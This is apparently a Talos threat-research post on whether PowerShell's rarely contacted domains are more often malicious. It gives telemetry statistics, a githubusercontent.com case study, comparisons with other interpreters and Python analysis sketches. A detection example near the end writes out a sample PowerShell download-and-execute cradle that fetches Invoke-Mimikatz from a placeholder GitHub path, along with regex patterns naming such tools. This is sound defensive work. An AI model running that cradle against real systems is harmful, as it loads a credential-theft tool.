Scarcity signals: Are rare activities red flags?

By Darin Smith and John Arneson

Cisco Talos reviewed six months of network connection telemetry logs spanning June 1, 2024 – Dec. 31, 2024, containing 3,220,829 log events and 742 unique base domains, to explore whether domains that PowerShell rarely contacts are more likely to be malicious.
Key findings reveal that the odds of a rare domain being malicious were 3.18 times higher than for frequently contacted domains (95% CI: 0.39–25.9). This suggests a trend towards higher risk in rare domains, although the confidence interval spans 1 and the difference is not statistically significant.
Notably, the non-rare domain ‘githubusercontent.com’ was flagged as malicious due to activity from its subdomain ‘raw.githubusercontent.com’. This is an example of why subdomains should be considered when looking for malicious network traffic, especially for cloud services where the service itself is legitimate, but the content hosted on it is not guaranteed to be.

Research Methodology

Hypothesis

At a sufficiently high volume of telemetry, domain names that PowerShell rarely connects to are more likely to be malicious than domains that are frequently connected to, regardless of PowerShell module.

Data Collection

Talos queried telemetry for PowerShell network connection logs from a time period of June 1, 2024 to Dec. 31, 2024. This dataset included the following processes: ‘powershell.exe’, ‘powershell studio.exe’, ‘powershell_ise.exe’, ‘powershelltools.exe’, ‘powershelltoolsx64.exe’, ‘pwsh’, and ‘pwsh.exe’. All of these processes are different versions of PowerShell. Talos excluded non-public top-level domains (TLDs), such as internal domains, to focus on external connections. 

Data Processing

Using the tldextract library, Talos extracted base domains (e.g., ‘automox.com’ from ‘api.automox.com’), resulting in 742 unique base domains. Rarity was defined as an average of ≤5 contacts per full domain, calculated by dividing a base domain's total contacts by its number of unique full domains. This threshold identified 550 rare domains (74.1% of the total).
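
The rarity calculation can be sketched as follows. This is a minimal illustration under stated assumptions, not Talos's actual pipeline: ‘naive_base_domain’ is a hypothetical stand-in for tldextract (it keeps only the last two labels, which is wrong for suffixes such as ‘co.uk’), and the input format, a mapping from full domain to contact count, is assumed.

```python
from collections import defaultdict

RARE_THRESHOLD = 5  # average contacts per full domain, per the definition above


def naive_base_domain(full_domain: str) -> str:
    """Hypothetical stand-in for tldextract: keep the last two labels."""
    return ".".join(full_domain.lower().rstrip(".").split(".")[-2:])


def classify_rarity(contacts_by_full_domain, base_domain=naive_base_domain):
    """Return {base: (total_contacts, n_full_domains, average, is_rare)}."""
    totals = defaultdict(int)
    full_domains = defaultdict(set)
    for full_domain, contacts in contacts_by_full_domain.items():
        base = base_domain(full_domain)
        totals[base] += contacts
        full_domains[base].add(full_domain.lower())
    result = {}
    for base, total in totals.items():
        n_full = len(full_domains[base])
        average = total / n_full
        result[base] = (total, n_full, average, average <= RARE_THRESHOLD)
    return result


# The githubusercontent.com counts come from this article's case study;
# 'cdn.rare.example' is a made-up domain added for contrast.
sample = {
    "raw.githubusercontent.com": 10,
    "objects.githubusercontent.com": 28,
    "cdn.rare.example": 3,
}
summary = classify_rarity(sample)
for base, row in sorted(summary.items()):
    print(base, row)
```

Passing a tldextract-based function as ‘base_domain’ would replace the naive stand-in without changing the rest of the sketch.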

Threat Intelligence and Manual Review

Talos assessed domain reputation using ReversingLabs (RL), which flagged a domain as malicious if any third-party source indicated so. To mitigate false positives (e.g., ‘adobe.com’), 29 domains were manually reviewed and overridden as benign, and their process arguments were documented. For subdomains such as ‘raw.githubusercontent.com’ under ‘githubusercontent.com’, the process arguments in those logs were manually reviewed. This review flagged 5 out of 10 connections as malicious based on commands such as downloading PowerSploit or executing Invoke-Mimikatz.
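
One way to picture how automated flags and analyst decisions combine is the set logic below. It is only a sketch: the function name, its parameters and ‘bad.example’ are hypothetical, and the article does not describe how the verdicts were actually stored or merged.

```python
def final_verdicts(vendor_flagged, manual_benign, manual_malicious):
    """Combine automated flags with analyst decisions into one malicious set."""
    # Analyst overrides remove false positives from the automated feed.
    confirmed = set(vendor_flagged) - set(manual_benign)
    # Manual review of process arguments can add base domains on its own.
    return confirmed | set(manual_malicious)


verdicts = final_verdicts(
    vendor_flagged={"adobe.com", "bad.example"},   # 'bad.example' is made up
    manual_benign={"adobe.com"},                   # overridden as benign
    manual_malicious={"githubusercontent.com"},    # flagged via argument review
)
print(sorted(verdicts))
```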

Findings & Analysis

Domain Contact Distribution

The distribution of contacts was heavily skewed:

Percentiles: 60th percentile at 5.0 contacts, 90th at 82.0, 95th at 321.55, and 99th at 7,925.87
Top Domains: ‘automox.com’ (2,282,308 contacts), ‘launchdarkly.com’ (493,812), and ‘amazonaws.com’ (166,536) accounted for most activity.
- Automox is a service for automated endpoint configuration and patch management.
- LaunchDarkly is a software development platform for managing feature flags and context-aware targeting of features.
- Amazon Web Services (AWS) is the largest cloud service provider.
Rare Domains: 550 of 742 domains fell into the rare category.
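
Fractional percentile values such as 321.55 typically arise when a percentile falls between two observations and is interpolated. The sketch below assumes linear interpolation between closest ranks, which the article does not confirm, and uses made-up contact counts rather than the study's data.

```python
def percentile(values, q):
    """Percentile (q in 0..100) using linear interpolation between ranks."""
    ordered = sorted(values)
    if not ordered:
        raise ValueError("no data")
    position = (len(ordered) - 1) * q / 100
    lower = int(position)
    upper = min(lower + 1, len(ordered) - 1)
    fraction = position - lower
    return ordered[lower] + (ordered[upper] - ordered[lower]) * fraction


# Made-up, heavily skewed contact counts for ten hypothetical domains.
contacts = [1, 1, 2, 3, 5, 8, 40, 300, 9000, 2_000_000]
for q in (60, 90, 95, 99):
    print(q, percentile(contacts, q))
```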

Figure 1. Cumulative distribution of domain contact frequencies.

Malicious Domain Statistics

Rare Domains: 9 malicious out of 550 (1.64%, 95% CI: 0.86%–3.08%)
Non-Rare Domains: 1 malicious out of 192 (0.52%, 95% CI: 0.09%–2.89%), notably ‘githubusercontent.com’
Odds Ratio: 3.18 (95% CI: 0.39–25.9), indicating a trend towards higher risk in rare domains, though not statistically significant (chi-square p=0.4291, Fisher’s exact p=0.4668), likely due to the small number of malicious domains (9 rare, 1 non-rare)
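
The statistics above can be approximated from the 2x2 table of rare/non-rare versus malicious/benign domains using only the Python standard library. The article does not say which interval or test variants were used; the Wilson score interval, the Wald interval on the log odds ratio and the Yates continuity correction below are assumptions. The Wald interval lands close to, but not exactly on, the reported odds-ratio bounds.

```python
import math

Z = 1.96  # approximate normal quantile for a 95% interval


def wilson_interval(successes, n, z=Z):
    """Wilson score interval for a proportion."""
    p = successes / n
    denom = 1 + z * z / n
    centre = (p + z * z / (2 * n)) / denom
    half = z * math.sqrt(p * (1 - p) / n + z * z / (4 * n * n)) / denom
    return centre - half, centre + half


def odds_ratio_wald(a, b, c, d, z=Z):
    """Odds ratio and Wald interval for the 2x2 table [[a, b], [c, d]]."""
    ratio = (a * d) / (b * c)
    se = math.sqrt(1 / a + 1 / b + 1 / c + 1 / d)
    log_ratio = math.log(ratio)
    return ratio, math.exp(log_ratio - z * se), math.exp(log_ratio + z * se)


def chi_square_yates_p(a, b, c, d):
    """Chi-square p-value (1 degree of freedom) with Yates correction."""
    n = a + b + c + d
    rows, cols = (a + b, c + d), (a + c, b + d)
    observed = ((a, b), (c, d))
    stat = 0.0
    for i in range(2):
        for j in range(2):
            expected = rows[i] * cols[j] / n
            stat += (abs(observed[i][j] - expected) - 0.5) ** 2 / expected
    # Survival function of the chi-square distribution with 1 degree of freedom.
    return math.erfc(math.sqrt(stat / 2))


def fisher_exact_two_sided(a, b, c, d):
    """Two-sided Fisher's exact test: sum of tables no likelier than observed."""
    row1, row2, col1 = a + b, c + d, a + c
    total = math.comb(row1 + row2, col1)

    def prob(k):
        return math.comb(row1, k) * math.comb(row2, col1 - k) / total

    observed = prob(a)
    low, high = max(0, col1 - row2), min(row1, col1)
    return sum(p for p in map(prob, range(low, high + 1))
               if p <= observed * (1 + 1e-9))


# Rows: rare, non-rare. Columns: malicious, benign (counts from this article).
table = (9, 541, 1, 191)
print("odds ratio, CI:", odds_ratio_wald(*table))
print("rare rate CI:", wilson_interval(9, 550))
print("non-rare rate CI:", wilson_interval(1, 192))
print("chi-square p:", chi_square_yates_p(*table))
print("Fisher p:", fisher_exact_two_sided(*table))
```

Under these assumptions the proportions' intervals and both p-values agree with the reported figures to the precision shown in the article.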

Case Study: githubusercontent.com

The non-rare domain ‘githubusercontent.com’ (38 contacts, 2 full domains: ‘raw.githubusercontent.com’ and ‘objects.githubusercontent.com’, average 19.00 contacts per full domain) was flagged as malicious due to 5 manually identified malicious contacts from ‘raw.githubusercontent.com’. These contacts involved potentially malicious PowerShell commands, such as downloading and executing scripts like PowerSploit or Invoke-Mimikatz. The other subdomain, ‘objects.githubusercontent.com’ (28 contacts), showed no malicious activity. This finding illustrates that even frequently contacted domains can serve malicious content from individual subdomains, emphasizing the need for subdomain-level analysis in threat detection.

Comparison to Other Processes

Another research question investigated was how the domains contacted by other similar processes would compare to those contacted by PowerShell. For the purposes of this research, Talos chose the following processes for analysis:

‘rundll32.exe’
Python (including macOS and Windows versions)
‘cmd.exe’
‘cscript.exe’
‘wscript.exe’
‘bash’
‘zsh’

These processes are primarily other command line or script interpreters, as well as ‘rundll32.exe’, which allows executing Dynamic Link Libraries (DLLs) from the command line.

When the same heuristics used for PowerShell were applied to the domains contacted by these processes, the results varied somewhat. Across 156,203 total connection records for ‘rundll32.exe’, 940 unique domains were contacted. Of these, 722 were “rare” under the same heuristic applied to PowerShell (an average of at most five contacts per full domain). Only one contacted domain, across the rare and non-rare groups combined, was found to be malicious.

Similarly, among 795,346 total connection records for Python, 825 unique domains were contacted and 616 were rare using the same criteria. None of the rare domains were malicious, while 1 of the non-rare domains was. The processes cscript, cmd, bash and zsh had similar results, with zero or single-digit numbers of malicious domains contacted. However, wscript was much more interesting. It had far less total utilization in the dataset investigated, with just 6,936 connection events and 82 unique domains contacted. Of these, 58 domains were rare (roughly 71%), and 5 were found to be malicious.
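
The per-process figures quoted in this article can be put side by side with a few lines of arithmetic. The sketch below uses only counts stated in the text; the ‘ProcessStats’ class and its field names are hypothetical, and the shares are per unique base domain, not per connection event.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessStats:
    name: str
    events: int     # total connection records
    domains: int    # unique base domains contacted
    rare: int       # base domains classified as rare
    malicious: int  # base domains found to be malicious

    @property
    def rare_share(self) -> float:
        return self.rare / self.domains

    @property
    def malicious_share(self) -> float:
        return self.malicious / self.domains


# Counts as reported in this article.
stats = [
    ProcessStats("powershell", 3_220_829, 742, 550, 10),
    ProcessStats("rundll32.exe", 156_203, 940, 722, 1),
    ProcessStats("python", 795_346, 825, 616, 1),
    ProcessStats("wscript.exe", 6_936, 82, 58, 5),
]

for s in sorted(stats, key=lambda s: s.malicious_share, reverse=True):
    print(f"{s.name:13} rare={s.rare_share:.1%} malicious={s.malicious_share:.2%}")

highest = max(stats, key=lambda s: s.malicious_share)
```

Sorting by malicious share puts ‘wscript.exe’ first, which is the basis for the wscript recommendation later in the article.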

Recommendations

Prioritize Rare Domains: Security teams should focus investigations on rare domains due to their higher likelihood of being malicious, despite statistical non-significance. This finding applies primarily to PowerShell and wscript among the processes considered in this research.
Subdomain Analysis: For frequently contacted domains, analyze subdomains and process arguments to detect malicious activity, as demonstrated with ‘githubusercontent.com’.
Integrate Manual Review: Combine automated threat intelligence with manual reviews to reduce false positives and identify nuanced threats, particularly in high-contact domains.
Investigate Anomalous Utilization of ‘wscript.exe’: Some environments may still commonly utilize wscript. However, this research suggests that in environments where it is rare, it has the highest likelihood to be used to connect to malicious domains of the processes researched.

Future Work

This research presents several opportunities for future research. One opportunity is temporal analysis to determine if there were time-based patterns for contacting domains, and if so, determining if these patterns could be used to identify malicious activity. This could potentially include seeing increased contacts of malicious domains during weekends or off-hours. Time-series analysis could be applied to the data to test this hypothesis.

Another opportunity is the behavioral analysis of process arguments, focusing on identifying recurring patterns tied to malicious activity, such as downloading PowerShell scripts from a remote host or exfiltrating data. This could be used to refine the current rarity-based comparison, in which 1.64% of rare domains versus 0.52% of non-rare domains were malicious. This may spotlight behavioral red flags and give actionable insights for more precise detection logic.
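
A first pass at this kind of argument analysis could tag command lines with simple pattern matches. The sketch below is illustrative only: the pattern names and regular expressions are assumptions chosen for this example, not a vetted detection rule set, and the sample command lines are made up.

```python
import re

# Illustrative patterns only; real detection logic would need far more care.
SUSPICIOUS_PATTERNS = {
    "download_cradle": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I),
    "in_memory_exec": re.compile(r"invoke-expression|\biex\b", re.I),
    "known_offensive_tool": re.compile(r"powersploit|invoke-mimikatz", re.I),
}


def tag_arguments(command_line: str) -> list:
    """Return the sorted names of all patterns found in a command line."""
    return sorted(name for name, pattern in SUSPICIOUS_PATTERNS.items()
                  if pattern.search(command_line))


# Made-up command lines; the URL path is a placeholder, not a real location.
suspicious = ("powershell.exe -nop -c \"IEX (New-Object Net.WebClient)."
              "DownloadString('https://raw.githubusercontent.com/<user>/<repo>/"
              "Invoke-Mimikatz.ps1')\"")
benign = r"powershell.exe -File C:\scripts\inventory.ps1"

print(tag_arguments(suspicious))
print(tag_arguments(benign))
```

Tags like these could be counted per domain to see which behaviors co-occur with rare or malicious destinations.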

Finally, future research can develop a risk scoring system that integrates multiple factors such as contact frequency, malicious rate, TLDs and even ReversingLabs’ network threat intelligence. This can provide a scalable and practical tool for security teams to prioritize high-risk domains, whether rare or non-rare like ‘githubusercontent.com’. This not only builds on the current analysis but also paves the way for more robust, data-driven strategies to combat threats.
